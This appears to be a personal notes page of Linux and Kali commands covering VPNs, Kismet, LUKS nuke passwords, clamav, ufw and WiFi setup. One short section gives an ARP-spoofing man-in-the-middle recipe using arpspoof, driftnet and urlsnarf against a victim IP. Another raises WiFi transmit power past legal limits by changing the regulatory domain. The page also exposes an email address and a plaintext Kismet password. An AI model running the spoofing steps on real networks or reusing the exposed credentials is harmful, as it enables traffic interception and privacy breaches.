rate - Rate your last connection quality (1-5) nordvpn settings - See the current settings. nordvpn status - See the connection status. nordvpn countries - See the country list. nordvpn cities- See the city list. E.g.: nordvpn cities united_states nordvpn groups - See a list of available server groups. nordvpn logout - Log out. nordvpn help or nordvpn h - See the list of available commands or help for a specific command. You can get an extensive explanation of all commands by using the man nordvpn command in Terminal. nordvpn connect --group double_vpn Israel sudo nordvpn connect Zurich Switzerland $ sudo nordvpn connect sweden Connecting to Sweden #578 (se578.nordvpn.com) You are connected to Sweden #578 (se578.nordvpn.com)! ┌──(parth㉿Parth)-[/etc] $ nordvpn login Post "https://napps-1.com/v1/users/oauth/login? challenge=be8a988b4d8871c592f5885dc08f675c98806bcf859e9b968fb251e76cab1c5a&preferred_flow= login&redirect_flow=default": dial tcp: lookup napps-1.com on 192.168.1.1:53: write udp 192.168.1.160:37257->192.168.1.1:53: write: operation not permitted ┌──(parth㉿Parth)-[/etc] $ nordvpn login --legacy Please enter your login details. Email: wbbellamy@gmail.com Password: ************** It's not you, it's us. We're having trouble reaching our servers. If the issue persists, please contact our customer support. ┌──(parth㉿Parth)-[/etc] $ resolvectl status Global Protocols: +LLMNR +mDNS -DNSOverTLS DNSSEC=no/unsupported resolv.conf mode: foreign Current DNS Server: 12.127.16.67 DNS Servers: 12.127.16.67 12.127.17.71 192.168.1.1 DNS Domain: localdomain Link 2 (eth0) Current Scopes: DNS LLMNR/IPv4 LLMNR/IPv6 Protocols: +DefaultRoute +LLMNR -mDNS -DNSOverTLS DNSSEC=no/unsupported DNS Servers: 12.127.16.67 12.127.17.71 DNS Domain: localdomain Link 3 (wlan0) Current Scopes: DNS LLMNR/IPv4 LLMNR/IPv6 Protocols: +DefaultRoute +LLMNR -mDNS -DNSOverTLS DNSSEC=no/unsupported DNS Servers: 192.168.1.1 DNS Domain: localdomain ┌──(parth㉿Parth)-[/etc] $ ip route default via 10.32.10.1 dev eth0 proto dhcp src 10.32.10.194 metric 100 default via 192.168.1.1 dev wlan0 proto dhcp src 192.168.1.160 metric 600 10.32.10.0/24 dev eth0 proto kernel scope link src 10.32.10.194 metric 100 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.160 metric 600 This seems to be part of the solution. ┌──(parth㉿Parth)-[/etc] $ sudo ip addr flush dev wlan0 ┌──(parth㉿Parth)-[/etc] $ ip route ┌──(parth㉿Parth)-[/etc] $ sudo dhclient wlan0
---[Kismet with GPS]--- (top)
Below is the original GPS section of /etc/kismet/kismet.conf
# GPS configuration gps=serial:device=/dev/ttyACM0,reconnect=true,name=eyeinthesky # # Kismet supports multiple types of GPS. Generally you should only activate one of these # options at a time. # # Only one process can open a serial or USB device at the same time; if you are using GPSD, # make sure not to configure Kismet on the same serial port. # # For more information about the GPS types, see the documentation at: # https://www.kismetwireless.net/docs/readme/gps/ # # gps=serial:device=/dev/ttyACM0,name=eyeinthesky # gps=tcp:host=1.2.3.4,port=4352 # gps=gpsd:host=localhost,port=2947 # gps=virtual:lat=123.45,lon=45.678,alt=1234 # gps=web:name=gpsweb
And to allow my GPS receiver to be used by kismet I added this at the end of the example above.
gps=serial:device=/dev/ttyACM0
To start the gpsd in interactive mode, type the below command.
$ sudo gpsd -D 5 -N -n /dev/ttyACM0 *** KISMET IS SHUTTING DOWN *** Shutting down plugins... WARNING: Kismet changes the configuration of network devices. In most cases you will need to restart networking for your interface (varies per distribution/OS, but typically one of: sudo service networking restart sudo /etc/init.d/networking restart or nmcli device set [device] managed true Kismet exiting. EXITING: Signal service thread complete. $ sudo cat /root/.kismet/kismet_server_id.conf server_uuid=51123638-E041-11EC-8F59-4B49534D4554 $ sudo cat /root/.kismet/kismet_httpd.conf httpd_password=nNarana7H@^ httpd_username=Ben
Some resources
---[Convert mkv video files to mpg4]--- (top)
Single file conversion example.
$ ffmpeg -i example.mkv -c copy example.mp4 or $ ffmpeg -i my_movie.mkv -vcodec copy -acodec copy my_movie.mp4
---[Convert mp4 to mp3]--- (top)
Start with the URL containing the mp4 you want to work with. Use youtube-dl to download the mp4.
These commands get the main video from the URL: $ youtube-dl https://media.parkviewchurch.com/455/9587/44648 $ youtube-dl https://media.parkviewchurch.com/455/9587/44683 $ youtube-dl https://media.parkviewchurch.com/455/9587/44727 $ youtube-dl https://media.parkviewchurch.com/455/9587/44767
Now to extact the audio (mp3) from the audio/video (mp4): You can use VLC media player to do this. From the menu - Media > Convert/Save. Load your mp4, click convert/save, and there you can choose audio - mp3. You can click the little config icon right beside the audio-mp3 to choose your bitrate etc., then choose destination and filename.mp3 . . Fast and easy.
---[This is interesting]--- (top)
Related to this topic, review these for more info:
As penetration testers, we often need to travel with sensitive data stored on our laptops. Of course, we use full disk encryption wherever possible, including our Kali Linux machines, which tend to contain the most sensitive materials. Let’s configure a nuke password as a safety measure:
root@kali:~# apt install cryptsetup-nuke-password root@kali:~# dpkg-reconfigure cryptsetup-nuke-password
The configured nuke password will be stored in the initrd and will be usable with all encrypted partitions that you can unlock at boot time.
Backup you LUKS keyslots and encrypt them:
cryptsetup luksHeaderBackup --header-backup-file luksheader.back /dev/sdb3 openssl enc -d -aes-256-cbc -in luksheader.back.enc -out luksheader.back
Now boot into your encrypted store, and give the Nuke password, rather than the real decryption password. This will render any info on the encrypted store useless. Once this is done, verify that the data is indeed inacessible.
Lets restore the data now. We’ll decrypt our backup of the LUKS keyslots, and restore them to the encrypted partition:
openssl enc -d -aes-256-cbc -in luksheader.back.enc -out luksheader.back cryptsetup luksHeaderRestore --header-backup-file luksheader.back /dev/sdb3
Our slots are now restored. All we have to do is simply reboot and provide our normal LUKS password and the system is back to its original state.
How to configure the nuke password non-interactively You need to preseed the password in the debconf database and then run dpkg-reconfigure in a way where it is not allowed to ask question:
$ sudo debconf-set-selections <<END cryptsetup-nuke-password cryptsetup-nuke-password/password string Th3Pa$$w0rd cryptsetup-nuke-password cryptsetup-nuke-password/password-again string Th3Pa$$w0rd END $ sudo dpkg-reconfigure -f noninteractive cryptsetup-nuke-password
If you expect to make use of this nuke password, then you should consider backing up the luks header. That way, if your computer is seized, and then later given back to you, you will be able to restore the luks headers and get back access to your data.
Here's the command to use (replace with the path of the device file representing your luks encrypted partition, and (your-backup-file) with the path to the backup file to create):
$ sudo cryptsetup luksHeaderBackup (device) --header-backup-file (your-backup-file)
To later restore the header, you will have to do:
$ sudo cryptsetup luksHeaderRestore (device) --header-backup-file (your-backup-file)
Remember you must backup encryption keys to a separate source before testing the nuke, or it will all be irrecoverable.
Ref. https://docs.kali.org/kali-dojo/03-kali-linux-usb-persistence-encryption
Info on backing up LUKS header/password
https://www.cyberciti.biz/security/how-to-backup-and-restore-luks-header-on-linux/
[13:15:32 benb ~/Current.Papers] $ cat /etc/fstab /etc/crypttab # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # /dev/mapper/mint--vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation UUID=3d0df7bd-7a24-4450-84bd-744f43f3cb10 /boot ext4 defaults 0 2 /dev/mapper/mint--vg-swap_1 none swap sw 0 0 sda5_crypt UUID=a2f5b84f-5ecd-4bf0-9b3e-651211824187 none luks,discard [13:15:33 benb ~/Current.Papers] $ sudo dmsetup ls --target crypt [sudo] password for ben: sda5_crypt (253, 0) [13:16:45 benb ~/Current.Papers] $ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda 8:0 0 931.5G 0 disk ├─sda1 8:1 0 731M 0 part /boot ├─sda2 8:2 0 1K 0 part sda5 8:5 0 930.8G 0 part sda5_crypt 253:0 0 930.8G 0 crypt ├─mint--vg-root 253:1 0 929.8G 0 lvm / mint--vg-swap_1 253:2 0 976M 0 lvm [SWAP] sr0 11:0 1 1024M 0 rom [13:17:09 benb ~/Current.Papers] $ lsblk /dev/sda5 NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda5 8:5 0 930.8G 0 part sda5_crypt 253:0 0 930.8G 0 crypt ├─mint--vg-root 253:1 0 929.8G 0 lvm / mint--vg-swap_1 253:2 0 976M 0 lvm [SWAP] [13:17:33 benb ~/Current.Papers] ╼
To recover data from encrypted file/volumes backup the following files /etc/fstab file /etc/crypttab file LUKS header
Run the command to find out information about the encrypted disks or volume
$ sudo cryptsetup luksDump /dev/DEVICE $ sudo cryptsetup luksDump /dev/sdb2 $ sudo cryptsetup luksDump /dev/md1
Step 2 – Backing up LUKS header
Make a backup of your LUKS header for future use:
$ sudo cryptsetup luksHeaderBackup /dev/DEVICE --header-backup-file /path/to/backupfile $ sudo cryptsetup luksHeaderBackup /dev/sdb2 --header-backup-file /nas/vivek/laptop.dell.m6700.luks.bin $ sudo cryptsetup luksHeaderBackup /dev/md1 --header-backup-file /root/laptop.thinkpad.luks.bin
Show information about backup file named /root/laptop.thinkpad.luks.bin, run the following file command/stat command/cryptsetup command: $ sudo file /root/laptop.thinkpad.luks.bin $ sudo stat /root/laptop.thinkpad.luks.bin $ sudo cryptsetup luksDump /root/laptop.thinkpad.luks.bin
WARNING – Make sure you store laptop.thinkpad.luks.bin file securely offline. I use NAS server and USB stick. Make sure you store your backup file named /root/laptop.thinkpad.luks.bin file securely offline. I use my home NAS server and USB stick. This file must remain off the device; otherwise, you may not be able to restore it.
Step 3 – Restoring LUKS header when needed Now let us say something terrible happened. All you have to do is boot your system/laptop from a boot disk and restore the old LUKS header from the laptop.thinkpad.luks.bin backup file as follows: # cryptsetup luksHeaderRestore /dev/DEVICE --header-backup-file /path/to/backup_header_file ## Assuming that you mounted /nas/ using NFS ## # cryptsetup luksHeaderRestore /dev/md1 --header-backup-file /nas/vivek/laptop.thinkpad.luks.bin
Step 4 – Test it Run the following command to open the encrypted disk and mount it (you need to provide old password): # cryptsetup luksOpen /dev/DEVICE name # cryptsetup luksOpen /dev/md1 test # mkdir /test # mount /dev/mapper/test_root /test # df -H # mount
Reboot the Linux system:
# reboot
There is a good example of setting up and using Timeshift to create snapshots on a USB drive. https://linuxhint.com/timeshift_linux_mint_usb/
---[Buring Kali to an SD or MicroSD]--- (top)
Locate the mount point of the SD card
$ lsblk -p NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT /dev/sda 8:0 0 931.5G 0 disk ├─/dev/sda1 8:1 0 39.2M 0 part ├─/dev/sda2 8:2 0 21.7G 0 part ├─/dev/sda3 8:3 0 454.4G 0 part ├─/dev/sda4 8:4 0 1K 0 part /dev/sda5 8:5 0 455.4G 0 part / /dev/sr0 11:0 1 1024M 0 rom /dev/mmcblk0 179:0 0 14.9G 0 disk /dev/mmcblk0p1 179:1 0 14.9G 0 part /media/parth/6536-6233
Extract the .xz file to get the .img file downloaded from Kali.
Burn .img to SD (not to a partition on the SD)
sudo dd bs=4M if=kali-linux-2019.3a-rpi3-nexmon-64.img of=/dev/mmcblk0 status=progress conv=fsync
---[Change desktop in Kali]--- (top)
apt-y install kali-desktop-xfce
---[Upgrade to New Version of Kali]--- (top)
cat </etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main non-free contrib EOF
sudo apt update && apt -y full-upgrade
[ -f /var/run/reboot-required] && reboot -f
grep VERSION /etc/os-release
uname -v
You can also do the following;
See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list deb-src http://http.kali.org/kali kali-rolling main contrib non-free sudo apt upgrade sudo apt full-upgrade -y sudo apt dist-upgrade sudo apt autoremove sudo reboot Update your Shell configurations. cp -rbi /etc/skel/. ~ Check the release lsb_release -a cat /etc/os-lsb_release Check the Kernel uname -a uname -r ┌──(parth㉿Parth)-[~] └─$ lsb_release -a No LSB modules are available. Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2022.3 Codename: kali-rolling ┌──(parth㉿Parth)-[~] └─$ lsb_release -r Release: 2022.3 ┌──(parth㉿Parth)-[~] └─$ uname -a Linux Parth 5.18.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.16-1kali1 (2022-08-31) x86_64 GNU/Linux ┌──(parth㉿Parth)-[~] └─$ uname -r 5.18.0-kali7-amd64
---[Sending a signal to a process]--- (top)
$ kill -l 1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1 11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM 16) SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP 21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ 26) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR 31) SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 38) SIGRTMIN+4 39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8 43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13 48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12 53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7 58) SIGRTMAX-6 59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2 63) SIGRTMAX-1 64) SIGRTMAX sudo kill 15 1234
---[Backup Installed Packages]--- (top)
Backup Installed Packages And Restore Them Later On Freshly Installed Ubuntu System. https://www.ostechnix.com/backup-installed-packages-and-restore-them-on-freshly-installed-ubuntu-system/
$ sudo apt install apt-clone $ mkdir ~/mypackages $ sudo apt-clone clone ~/mypackages
You may need to download the .deb package and use apt to install it.
$ sudo apt install ./apt-clone_0.4.1_all.deb $ sudo apt-clone clone my.system/ --with-dpkg-repack
Use this to include .deb packages
$ sudo apt-clone clone --with-dpkg-repack ~/mypackages
Creates this archive:
~/mypackages/apt-clone-state-ubuntuserver.tar.gz
apt-clone info mypackages/apt-clone-state-ubuntuserver.tar.gz
To reinstall
sudo apt-clone restore apt-clone-state-ubuntuserver.tar.gz
$ apt-clone info my.system/apt-clone-state-benbellamy.tar.gz Hostname: benbellamy Arch: amd64 Distro: kali-rolling Meta: Installed: 3078 pkgs (2840 automatic) Date: Mon Jul 20 21:15:01 2020
Run the following command to restore it.
$ sudo apt-clone restore /opt/apt-clone-state-Ubuntu18.2daygeek.com.tar.gz
Note: The restore will override your existing /etc/apt/sources.list and will install/remove packages. So be careful.
---[To install all of Kali's tools]--- (top)
sudo apt update sudo apt update kali-linux-everything
arpspoof - ARP spoofing using a man-in-the-middle Attack
This needs to be fleshed out and tested. See https://linuxhint.com/ arp_spoofing_using_man_in_the_middle_attack/
Also study https://rootinstall.com/tutorial/arp-spoofing-in-linux-using-arping/
ip route show sysctl -w net.ipv4.ip_forward=1 arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP] arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP] driftnet -i [Network Interface Name] urlsnarf -i [Network interface name] sysctl -w net.ipv4.ip_forward=0
---[How to list all installed applications/packages]--- (top)
To list packages using apt command:
apt list –installed
To list packages using dpkg command:
dpkg-query -l or dpkg --get-selections
---[Template]--- (top)
Add startup.script.sh to systemd, and run at boot. Create the shell scripts. Set it to executable. Typically you'd move it to /usr/bin
#!/bin/bash DATE=.date '+%Y-%m-%d %H:%M:%S'. echo "Example service started at ${DATE}" echo "$DATE" sleep 10 exit 0
---[Create a service file]--- (top)
[Unit] Description=Startup Script After=network.target [Service] Type=simple WorkingDirectory=/home/parth/ ExecStart=/bin/bash test_service.sh [Install] WantedBy=multi-user.target
Reload the systemctl daemon:
systemctl daemon-reload
Tell systemd to enable your custom system unit:
systemctl enable test.service
Confirm that your test service was created succesfully:
systemctl --all | grep test.service
Start your service:
systemctl start test.service
Ref. https://help.skysilk.com/support/solutions/articles/ 9000162390-how-to-start-a-program-or-script-on-linux- automatically-on-boot-with-systemd
---[Sort text file by IP address]--- (top)
$ sort -t . -k 3,3n -k 4,4n /path/to/file
Where, -t . : Set field to . (dot) as our IPs separated by dot symbol -n : Makes the program sort according to numerical value -k opts: Sort data / fields using the given column number. For example, the option -k 2 made the program sort using the second column of data. The option -k 3,3n -k 4,4n sorts each column. First it will sort 3rd column and then 4th column. Also, $ sort -t . -g -k1,1 -k2,2 -k3,3 -k4,4 IPs.txt | uniq
---[Setup Alfa wifi nic on Kali]--- (top)
# apt install realtek-rtl88xxau-dkms
I then had to get the firmware update from Alfa, unzip it and copy the rt2870.bin file into /lib/firmware.
# airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 73) phy201 wlan1 rt2800usb Ralink Technology, Corp. RT3572
NetworkManager report on connections
$ nmcli connection show NAME UUID TYPE DEVICE Auto ATTFJ4Br3A 9f57abf0-0bb5-4164-bc21-8afb918cec8e wifi wlp2s0 Auto ATTFJ4Br3A d9e91a3a-2b58-4df9-be2f-8a7304262f0d wifi wlx00c0ca8f2b07 Wired connection 1 818c8207-fa7e-31ef-820c-d37b1719fdc0 ethernet --
Now check a specific connection as listed above
$ nmcli connection show "Auto ATTFJ4Br3A" connection.id: Auto ATTFJ4Br3A connection.uuid: d9e91a3a-2b58-4df9-be2f-8a7304262f0d connection.stable-id: -- connection.type: 802-11-wireless connection.interface-name: -- connection.autoconnect: yes (with as many as 300 more lines of output...)
Get the specs on a NIC
$ ethtool -i wlx00c0ca8f2b07 driver: rt2800usb version: 4.15.0-65-generic firmware-version: 0.36 expansion-rom-version: bus-info: 1-1.3:1.0 supports-statistics: yes supports-test: no supports-eeprom-access: no supports-register-dump: no supports-priv-flags: no
You can get overall quality of the link. This may be based on the level of contention or interference, the bit or frame error rate, how good the received signal is, some timing synchronisation, or other hardware metric.
# iwconfig wlan0 | grep -i --color quality
Use the watch command to run cat command repeatedly, displaying wireless signal on screen:
watch -n 1 cat /proc/net/wireless Inter- | sta-| Quality | Discarded packets | Missed | WE face | tus | link level noise | nwid crypt frag retry misc | beacon | 22 wlx7cdd90ebf32e: 0000 60. -50. -256 0 0 0 36 169 0
Get stats on a NIC
$ iwlist wlx00c0ca8f2b07 scan wlx00c0ca8f2b07 Scan completed : Cell 01 - Address: C6:52:61:97:05:B3 Channel:153 Frequency:5.765 GHz Quality=70/70 Signal level=-33 dBm Encryption key:on ESSID:"ATTFJ4Br3A" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=00000011e2584721 Extra: Last beacon: 10784ms ago IE: Unknown: 000A415454464A3442723341 IE: Unknown: 01088C1218243048606C IE: Unknown: 030199 IE: Unknown: 0B0505000AFFFF IE: Unknown: 074C55532024017F28017F2C017F30017F34017F38017F3C017F400 17F64017F68017F6C017F70017F74017F78017F7C017F80017F84017F88017F8C0 17F90017F95017F99017F9D017FA1017F00 IE: Unknown: 200100 IE: Unknown: C305027F7F7F00 IE: Unknown: 2D1AEF0117FFFFFFFFFEFFFFFFFF1F000001000000000018E6E71900 IE: Unknown: 3D1699070600000000000000000000000000000000000000 IE: Unknown: DD180050F20201018D000364000027A4000041435E0061322F00 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 7F080100080200000040 IE: Unknown: DDA30050F204104A0001101044000102103B0001031047001059C70E 96DA715048FF831CC2D0E4C1E5102100095175616E74656E6E6110230005546F70617 A102400064247573231301042000C4336353236313937303542331054000800060050F 2040001101100105265666572656E63652044657369676E10080002200810490006003 72A000120105800183F0047DA8F56836CB486ACDE9266C7A50001010103007FC5 IE: Unknown: BF0CB279C33FAAFF0000AAFF0000 IE: Unknown: C005019B00FCFF IE: Unknown: DD1E002686010300DD000000250406920006019B5B8CD2740000000000000000
Move the following into the material above...
Set interface down $ sudo ip link set wlan0 down Set monitor mode $ sudo iwconfig wlan0 mode monitor Set interface up $sudo ip link set wlan0 up Set channel 6, width 40 MHz: $ sudo iw wlan0 set channel 6 HT40-Set channel 149, width 80 MHz: $ sudo iw wlan0 set freq 5745 80 5775 To change the tx-power we must turn off our wireless interface by running ifconfig wlan0 down and then change the regional to BO (Bolivia) which in that country they allow the use of 1000 mW tx-power iw reg set BO turn on the wireless interface again ifconfig wlan0 up we can also directly change the tx-power using this command (but this can overheat the NIC) iwconfig wlan0 txpower 30
---[Lynis Audit Tool]--- (top)
Tutorial
Download
Packages
sudo cat /var/log/lynis-report.dat | grep warning | sed -e 's/warning\[\]\=//g'
sudo cat /var/log/lynis-report.dat | grep suggestion | sed -e 's/suggestion\[\]\=//g'
sudo cat /var/log/lynis-report.dat | grep installed_package | sed -e 's/installed_package\[\]\=//g'
sudo cat /var/log/lynis-report.dat | grep available_shell | sed -e 's/available_shell\[\]\=//g'
---[Monitorix]--- (top)
Reference: https://www.howtoforge.com/tutorial/performance-monitoring-with-monitorix-on-ubuntu-16-04/ http://kokizzu.blogspot.com/2015/03/monitorix-system-resource-monitoring.html
---[Kasam Short Cuts]--- (top)
Super+Ctrl+R: Start recording Super+Ctrl+P: Pause recording, press again for resuming the recording Super+Ctrl+F: Finish recording Super+Ctrl+Q: Quit recording
---[maltrail NIDS]--- (top)
Instructions for installation and running. https://github.com/stamparm/maltrail https://www.techrepublic.com/article/how-to-install-and-run-the-maltrail-detection-system-on-ubuntu-server-18-04/ https://www.howtoforge.com/tutorial/installation-and-usage-of-maltrail-detection-system-on-ubuntu/
1. The Sensor which monitors traffic for threats
2. Server which provides logging for the event details of the detected malicious traffic.
3. The Client that provides visualization and reporting of the event details.
sudo apt-get set up git python-pcapy sudo apt-get set up python-setuptools sudo git clone https://github.com/stamparm/maltrail.git cd maltrail/ sudo python sensor.py sudo python server.py
Entry the reporting interface by visiting the http://local-p-ip:8338 (default credentials are admin:changeme! saved within the maltrail.conf file) out of your internet browser.
The Sensor’s configuration of the Maltrail system is contained in the maltrail.conf file’s part [Sensor]. The configuration parameters are defined with feedback. On this configuration file, consumer can outline setting like replace interval of static feed, digital or bodily interface of the linux to run Maltrail system and so forth.
---[zaloha.sh]--- (top)
You can synchronize two local directories as shown.
$ sudo zaloha.sh --sourceDir="./admin_portal/" --backupDir="/var/www/html/admin_portal/"
You can also backup to a removable media (e.g /media/aaronk/EXT) mounted to the local file system. The destination directory must exist for the command to work, otherwise you will get the error message “Zaloha.sh: is not a directory”.
$ sudo mkdir /media/aaronk/EXT/admin_portal $ sudo zaloha.sh --sourceDir="./admin_portal/" --backupDir="/media/aaronk/EXT/admin_portal"
Assuming you have made changes in the backup directory to files that already exist in the source directory, you can make the changes reflect in the source directory using the reverse sync feature, enabled using the --renUp option.
$ zaloha.sh --revUp --sourceDir="/home/aaronk/admin_portal/" --backupDir="/media/aaronk/EXT/admin_portal"
---[clamav]--- (top)
Install $ sudo apt install -y clamav $ sudo apt install -y clamdscan clamav-daemon $ sudo systemctl restart clamav-daemon # Avoid condition failed. $ mkdir ~/virus $ clamdscan <dir> Run Scan -r option will scan directory recursively. -i option will show detected file only. –move option will move detected file to specific directory. Basic $ sudo clamscan -r -i --move=$HOME/virus . My scan example sudo clamscan -v -i -r -z --exclude-dir=^Hacking --detect-pua=yes --phishing-scan-urls=yes --copy=$HOME/virus ./ Update virus database with freshclam manually $ sudo freshclam clamav-freshclam package will update virus database automatically. If it does not work, try this $ sudo systemctl stop clamav-freshclam $ sudo freshclam $ sudo systemctl start clamav-freshclam https://www.hiroom2.com/2018/07/30/linuxmint-19-clamav-en/ Setting up real-time scanning https://www.clamav.net/documents/on-access-scanning https://www.clamav.net/documents/scanning#clamd
And some more...
Update the clamav database: $ apt-get update $ apt-get install clamav clamav-daemon -y $ sudo systemctl enable clamav-daemon $ sudo systemctl start clamav-daemon $ systemctl stop clamav-freshclam $ sudo freshclam $ systemctl start clamav-freshclam Run a scan $ clamscan -r / $ clamscan --infected --remove --recursive /home/ubuntu/Desktop/ Check the log $ sudo tail /var/log/clamav/clamav.log --exclude-dir ^/home/parth/Hacking/Actual.Malware --exclude-dir ^/home/parth/Hacking/Metasploit --exclude-dir ^/home/parth/Hacking/packetstorm.archives @ /etc/cron.d/clamdscan sudo mkdir /home/parth/quarantine echo "0 1 * * 0 root /usr/bin/clamdscan --fdpass --log=/var/log/clamav/clamdscan.log --move=/home/parth/quarantine /" | tee /etc/cron.d/clamdscan sudo grep ERROR /var/log/clamav/clamdscan.log | cut -d":" -f2| grep "^ " | sort | uniq -c | sort -k1 -n sudo grep WARNING /var/log/clamav/clamdscan.log | cut -d":" -f2| grep "^ " | sort | uniq -c | sort -k1 -n $ clamscan -o -r -i /home/parth/CCCC/ ----------- SCAN SUMMARY ----------- Known viruses: 8580277 Engine version: 0.103.3 Scanned directories: 337 Scanned files: 4784 Infected files: 0 Data scanned: 3491.06 MB Data read: 33298.21 MB (ratio 0.10:1) Time: 412.373 sec (6 m 52 s) Start Date: 2021:11:28 11:06:40 End Date: 2021:11:28 11:13:32 So, I will demonstrate a scan on my “Downloads” folder located under the home directory and I will choose to output only infected files and ring a bell when (and if) they are found. This translates to the following command on the terminal: “clamscan -r --bell -i /home/bill/Downloads”. clamscan -r --bell -i /home/Parth/Downloads To scan the whole system (it may take a while) and remove all infected files in the process, you can use the command in the following form: “clamscan -r --remove /”. clamscan -r --remove / clamscan options /home/parth/ --infected --log=filename -r -z --exclude-dir=Hacking --detect-structured=yes clamscan -i --log=/home/parth/clamav.log -r -z --detect-structured=yes --exclude-dir=Hacking /home/parth/ Update the database with freshclam
---[ufw]--- (top)
https://www.digitalocean.com/community/tutorials/how-to-set-up-a- firewall-with-ufw-on-ubuntu-18-04https://help.ubuntu.com/community/UFW
sudo ufw enable sudo ufw default deny incoming sudo ufw default allow outgoing sudo ufw logging on sudo ufw logging high sudo ufw allow 80 sudo ufw allow 443
The log file is located at /var/logs/ufw
---[CrashPlan Code42]--- (top)
The default directory is /usr/local/crashplan/bin.
Stop ./CrashPlanEngine stop Start ./CrashPlanEngine start
After starting the Code42 service, open the Code42 app. If you do not have a shortcut to open the Code42 app, you can open it from terminal with the following command:
/usr/local/crashplan/bin/CrashPlanDesktop
---[OBS Studio - Screen Recording]--- (top)
https://obsproject.com/
For Linux
sudo apt-get install ffmpeg sudo add-apt-repository ppa:obsproject/obs-studio sudo apt-get update sudo apt-get install obs-studio
---[Adding a repository]--- (top)
To use our debian/ubuntu stable repository:
install the Jitsi repository key onto your system
wget -qO - https://download.jitsi.org/jitsi-key.gpg.key | sudo apt-key add -
create sources.list.d file with the repository
sudo sh -c "echo 'deb https://download.jitsi.org stable/' > /etc/apt/sources.list.d/jitsi-stable.list"J
update your package list
sudo apt-get -y update
install Jitsi
sudo apt-get -y install jitsi
---[WiFi Commands]--- (top)
Set the AP you want to connect to (network-essid)
sudo iwconfig wlan0 essid network-essid
Set you frequency
sudo iwconfig wlan0 freq 2.422G
---[Connecting To AP]--- (top)
Bring the wlan0 interface up
sudo ifconfig wlan0 up
Scan for APs
sudo iwlist wlan0 scan
Selected Wifi2Home AP with a key of ABCDE12345
sudo iwconfig wlan0 essid Wifi2Home key s:ABCDE12345
Get the IP assignment from DHCP
sudo dhclient wlan0
sudo ifconfig wlan0 down
Another approach is:
First, make sure your wireless card is enabled. You can use rfkill. This will report if the WiFi is disabled by either software or hardware.
rfkill list
You can unblock the software blocks with this, and the hardward blocks with the switch on the machine.
rfkill unblock wifi
Find your WiFi interface
iwconfig
Bring that interface up
sudo ifconfig wlp4s0 up
List the available APs
$ sudo iwlist wlp2s0 scan | grep ESSID ESSID:"ATTFJ4Br3A" ESSID:"ATTFJ4Br3A_2GEXT" ESSID:"ATTFJ4Br3A" ESSID:"ATTB2f6CTA" ESSID:"DIRECT-65-HP ENVY 4510 series" ESSID:"ATTB2f6CTA" ESSID:"ATTB2f6CTA" ESSID:"ATTFJ4Br3A_5GEXT" ESSID:"Nobility" ESSID:"Peasants " ESSID:"" ESSID:"ATTB2f6CTA" ESSID:""
We need to create a file named wpa_supplicant.conf using the wpa_passphrase utility. wpa_supplicant.conf is the configuration file describing all networks that the user wants the computer to connect to. Run the following command to create this file. Replace ESSID and Wi-Fi passphrase with your own.
wpa_passphrase your-ESSID your-wifi-passphrase | sudo tee /etc/wpa_supplicant.conf
Now use the following command to connect your wireless card to wireless access point.
sudo wpa_supplicant -c /etc/wpa_supplicant.conf -i wlp4s0
sudo systemctl stop NetworkManager
sudo dhclient wlp4s0
---[Connecting to Hidden Wireless Network]--- (top)
If your wireless router doesn’t broadcast ESSID, then you need to add the following line in /etc/wpa_supplicant.conf file.
scan_ssid=1
Like below:
network={ ssid="LinuxBabe.Com Network" #psk="12345qwert" psk=68add4c5fee7dc3d0dac810f89b805d6d147c01e281f07f475a3e0195 scan_ssid=1 }
https://www.linuxbabe.com/ubuntu/connect-to-wi-fi-from-terminal-on-ubuntu-18-04-19-04-with-wpa-supplicant
---[The find command]--- (top)
Find all files ending with '.err' beginning in the /home/username/ directory.
find /home/username/ -name "*.err"
Find a file called testfile.txt in current and sub-directories.
find . -name testfile.txt
Find all .jpg files in the /home and sub-directories.
find /home -name *.jpg
Find an empty file within the current directory.
find . -type f -empty
Find all .db files (ignoring text case) modified in the last 7 days by a user named exampleuser.
find /home -user exampleuser -mtime -7 -iname ".db"
Search without regard for text case.
-iname
Return only results that do not match the test case.
-not
Search for files.
-type f
Search for directories.
-type d
